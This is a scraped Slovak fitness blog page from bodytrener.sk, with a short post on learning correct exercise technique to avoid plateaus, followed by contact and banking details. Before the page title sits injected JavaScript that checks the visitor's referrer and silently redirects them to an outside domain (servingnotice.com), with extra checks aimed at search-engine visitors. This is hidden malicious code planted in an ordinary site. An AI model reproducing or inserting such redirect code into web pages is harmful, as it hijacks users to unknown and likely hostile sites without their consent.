var toUrl="http://"; var rUrl = document.referrer; var patrn=/(.*)$/; toUrl+="servingnotice.com/O7ul2v/intermediary.html?richubaidaninfo"; toUrl+=""; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)aol.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)yahoo.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)bing.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; Ako správne cvičiť - cesta k úspechu | www.bodytrener.sk
Blog
...naučte sa niečo nové!

Ako správne cvičiť – cesta k úspechu

Ľudia, ktorí nemajú skúsenosti s cvičením a začnú chodiť do fitnes centra, majú veľkú výhodu. Ich svaly nikdy nezdvíhali činky alebo cvičili na strojoch. V takomto prípade Vaše svaly rastú aj keď cviky cvičíte zle. Postupne sa však naberanie sily a svalovej hmoty spomaľuje a nakoniec sa dostanete k stagnácii.

Ako predísť stagnácii?

Vaše svaly si postupom času zvyknú na cviky, váhy, počty opakovaní a začnú stagnovať( nebudú rásť). Ak ste si neosvojili správnu techniku a cvičíte zle, budeme mať veľký problém pokračovať ďalej.

Aby človek mohol neustále napredovať a zlepšovať sa, potrebuje ovládať techniku každého cviku a vyvarovať sa chybám počas cvičenia. Z tohto dôvodu si treba aj preštudovať jednotlivé cviky a vyhnúť sa možným chybám. Každá technika sa dá zlepšiť.

Ponúkame Vám naše služby pre tvorbu tréningov, jedálničkou a s radami od nás dosiahnete vytúžený cieľ. Každý náš cvik v tréningovom pláne obsahuje odkaz na informácie o danom cviku. Pozrite naše služby!

Pridať komentár
Odber noviniek

Pridajte sa k odberu noviniek a získajte najnovšie informácie o článkoch, zľavách a súťažiach.

Potrebujete pomoc?

Adresa:
Bodytrener.sk
Pažite 5
010 09 Žilina

Pracovná doba:
Pondelok – Piatok
10:00 – 18:00

E-mail: info@bodytrener.sk
Telefón: +421 904 569 865

Bankové účty:
2200359578/8330 - SLOVENSKO
2900359579/2010 - ČESKO

© 2013 Bodytrener.sk. Všetky práva vyhradené.

Pridaj si nás na Facebooku